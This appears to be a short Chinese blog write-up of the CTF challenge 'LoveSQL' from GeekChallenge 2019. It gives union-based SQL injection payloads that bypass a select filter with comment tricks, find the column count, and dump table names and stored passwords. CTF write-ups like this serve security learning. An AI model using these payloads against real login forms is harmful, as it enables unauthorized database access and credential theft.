19.[极客大挑战 2019]LoveSQL
考察知识点:
1.union/**/select sql注入
- 过滤测试
虽然select被过滤但是union/**/select还可以使用
2.确定字段数
构造:
1 | ?username=admin&password=admin'union/**/select+null,null,null# |
当null的数量为四时,报错,所以查询数据库表有四个字段
3.确定回显点
用户密码可用作回显点
\4. 暴库
![3](19.[极客大挑战 2019]LoveSQL/3.png)
5.爆表
1 | /check.php?username=admin&password=admin'union/**/select+null,null,group_concat(table_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database();%23 |
![4](19.[极客大挑战 2019]LoveSQL/4.png)
\6. 爆字段内容
1 | ?username=admin&password=admin'union/**/select+null,null,group_concat(password)/**/from/**/l0ve1ysq1;%23 |
![5](19.[极客大挑战 2019]LoveSQL/5.png)
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 h11ba1's blog!
评论